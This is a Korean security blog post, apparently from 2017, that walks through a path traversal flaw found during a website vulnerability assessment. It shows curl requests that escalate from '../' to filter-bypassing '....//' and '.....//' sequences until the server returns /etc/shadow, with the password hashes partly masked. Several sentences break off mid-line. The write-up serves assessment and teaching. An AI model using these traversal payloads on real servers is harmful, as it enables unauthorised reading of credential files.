홈페이지 취약점 분석 이야기 | 파일 지도 사진 깨알 |
---|
>> 목록보이기 어떤 경로조작 취약점 점검 과정이 문서는 홈페이지 취약점 분석과정에서 발견한 실제 취약점이다. 해당 누리집은 Apache 웹서버와 Apache Tomcat 기반의 서비스였으며 톰캣이 root 권한으로 실행중이어서 /etc/shadow 파일 다운로드가 가능하였다. 참고할 웹해킹 훈련장다음 훈련장은 위의 취약점과 유사한 환경에서 시스템 침투/장악 과정을 설명하고 있으므로 참조하기 바란다. 점검 및 취약점 진단해당 누리집이 제공하는 파일 다운로드 기능은 다음과 같다. https://www.victim.co.kr/file/FileDownload.jsp?fileName=brochure_img.zip
root@kali:~# curl -I https://www.victim.co.kr/file/FileDownload.jsp?fileName=brochure_img.zip HTTP/1.1 200 OK Date: Wed, 29 Mar 2017 07:24:04 GMT Content-Disposition: attachment;filename=brochure_img.zip Content-Transfer-Encoding: binary Pragma: no-cache; Content-Length: 2043094 Content-Type: application/octer-stream root@kali:~#
다운로드할 파일인
이 다운로드 기능이 상위 경로( root@kali:~# curl -I https://www.victim.co.kr/file/FileDownload.jsp?fileName=../brochure_img.zip HTTP/1.1 200 OK Date: Wed, 29 Mar 2017 07:26:00 GMT Content-Disposition: attachment;filename=brochure_img.zip Content-Transfer-Encoding: binary Pragma: no-cache; Content-Length: 2043094 Content-Type: application/octer-stream root@kali:~#
위의 결과는
입력이 root@kali:~# curl -I https://www.victim.co.kr/file/FileDownload.jsp?fileName=../../brochure_img.zip HTTP/1.1 200 OK Date: Wed, 29 Mar 2017 07:26:47 GMT Content-Disposition: attachment;filename=brochure_img.zip Content-Transfer-Encoding: binary Pragma: no-cache; Content-Length: 2043094 Content-Type: application/octer-stream root@kali:~#
역시
위의 결과에서
이번에 사용한 입력은 root@kali:~# curl https://www.victim.co.kr/file/FileDownload.jsp?fileName=.../.../etc/shadow <html> <br/><h2>Could not get file name:<br>..etc/shadow<h2> <br/><center><h3><a href='javascript: history.go(-1)'>Back</a></h3></center> <br/>© webAccess </html> root@kali:~#
위에서 오류가 발생했을 때 이렇게 친절한(?) 정보를 제공하게 되면 악의적인 공격자들에게 도움을 줄 수 있다.
이번에 사용한 입력은 root@kali:~# curl https://www.victim.co.kr/file/FileDownload.jsp?fileName=....//....//etc/shadow <html> <br/><h2>Could not get file name:<br>../../etc/shadow<h2> <br/><center><h3><a href='javascript: history.go(-1)'>Back</a></h3></center> <br/>© webAccess </html> root@kali:~#
서버의 메시지에서 공격자가 입력한 "
이제 공격자는 원하는 시스템 파일을 열어볼 수 있는 가능성이 있다는 것을 알게 되었다.
충분하게 많은 "
이번에 사용한 입력은 root@kali:~# curl https://www.victim.co.kr/file/FileDownload.jsp?fileName=.....//.....//.....//.....//.....//.....//.....//etc/shadow root:$6$****************$***********************.eRLuEPxumyfacBxM**********************************************:16789:0:99999:7::: bin:*:16372:0:99999:7::: daemon:*:16372:0:99999:7::: adm:*:16372:0:99999:7::: lp:*:16372:0:99999:7::: sync:*:16372:0:99999:7::: shutdown:*:16372:0:99999:7::: halt:*:16372:0:99999:7::: mail:*:16372:0:99999:7::: operator:*:16372:0:99999:7::: games:*:16372:0:99999:7::: ftp:*:16372:0:99999:7::: nobody:*:16372:0:99999:7::: avahi-autoipd:!!:16789:::::: pegasus:!!:16789:::::: dbus:!!:16789:::::: polkitd:!!:16789:::::: abrt:!!:16789:::::: tss:!!:16789:::::: apache:!!:16789:::::: unbound:!!:16789:::::: usbmuxd:!!:16789:::::: saslauth:!!:16789:::::: colord:!!:16789:::::: ntp:!!:16789:::::: libstoragemgmt:!!:16789:::::: rpc:!!:16789:0:99999:7::: postfix:!!:16789:::::: rtkit:!!:16789:::::: qemu:!!:16789:::::: chrony:!!:16789:::::: rpcuser:!!:16789:::::: nfsnobody:!!:16789:::::: radvd:!!:16789:::::: sssd:!!:16789:::::: pulse:!!:16789:::::: gdm:!!:16789:::::: gnome-initial-setup:!!:16789:::::: pcp:!!:16789:::::: avahi:!!:16789:::::: sshd:!!:16789:::::: oprofile:!!:16789:::::: tcpdump:!!:16789:::::: webmanager:$6$****************$******.GIn/****/*********************************************************************.:16789:0:99999:7::: systemd-bus-proxy:!!:16789:::::: systemd-network:!!:16789:::::: tomcat:!!:16790:0:99999:7::: root@kali:~#
보통 경로조작 취약점은
이 웹 서버의 경우에는 특정 IP 주소에서만 SSH 접속이 되도록 설정되어 있었다.
때문에 [처음 작성한 날: 2017.03.29] [마지막으로 고친 날: 2017.03.29] < 이전 글 : 칼리 리눅스를 이용한 From SQL Injection to Shell 공략 (2017.04.04) > 다음 글 : WH-WebEditor-CH 라이브 ISO: 이미지 검증 기능을 우회하여 PHP 웹쉘 생성 (2017.01.30) 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다. 잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다. 문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문 |